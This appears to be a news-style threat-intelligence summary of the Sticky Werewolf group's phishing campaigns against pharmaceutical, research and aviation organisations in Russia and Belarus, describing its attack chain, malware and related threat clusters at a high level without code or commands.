Sticky Werewolf's Cyber Attacks on Businesses in Russia and Belarus

In a startling revelation, cybersecurity researchers have identified the expansion of cyber attacks by the notorious threat actor Sticky Werewolf, targeting critical sectors in Russia and Belarus. The group's latest campaign has widened its scope beyond government organizations to now include the pharmaceutical industry, microbiology research institutes, and the aviation sector.

Latest Developments:

  • Sophisticated Phishing Techniques:

    • Initial Approach: Early campaigns utilized phishing emails with links to malicious files hosted on platforms like gofile.io.
    • Current Strategy: Now employs RAR archives containing LNK files that direct to payloads on WebDAV servers, demonstrating an evolution in their attack methodology.
  • Broadened Target Range:

    • Earlier Focus: Primarily targeted government organizations.
    • Expanded Targets: Now includes pharmaceutical companies, research institutes, and aviation firms, indicating a strategic shift to more diverse and impactful sectors.
  • Complex Attack Chain:

    • New Mechanism: Involves RAR attachments that, when extracted, present LNK files alongside a decoy PDF document purportedly for a video conference invitation.
    • Execution Flow: Activating the LNK files launches a binary from a WebDAV server, executing an obfuscated batch script that runs an AutoIt script to inject the final payload.
  • Malicious Payloads:

    • Current Deployments: Involves commodity RATs (Remote Access Trojans) and data-stealing malware like Rhadamanthys and Ozone RAT.
    • Technical Details: Uses a variant of the CypherIT crypter, retooled from its original form found on hacking forums.
  • Geopolitical Implications:

    • Possible Attribution: While exact origins remain unclear, the geopolitical context hints at potential links to pro-Ukrainian cyberespionage groups or hacktivist factions.
    • Associated Threat Actors: Includes groups like Cloud Werewolf, Quartz Wolf, Red Wolf, and Scaly Wolf, all contributing to a complex cyber threat landscape.

Historical Context:

  • Initial Identification:

    • Documentation: Sticky Werewolf was first reported by BI.ZONE in October 2023, with activity traced back to April 2023.
  • Related Cyber Clusters:

    • Sapphire Werewolf: Linked to over 300 attacks across various sectors including education, manufacturing, IT, defense, and aerospace engineering.
    • Fluffy Wolf and Mysterious Werewolf: Known for deploying spear-phishing tactics to spread malware such as Remote Utilities, XMRig miner, WarZone RAT, and a custom backdoor named RingSpy.

As Sticky Werewolf continues to refine its tactics and broaden its target range, the cybersecurity defenses in Russia and Belarus face unprecedented challenges. Vigilance and robust cybersecurity measures are imperative to counter the sophisticated strategies employed by these threat actors.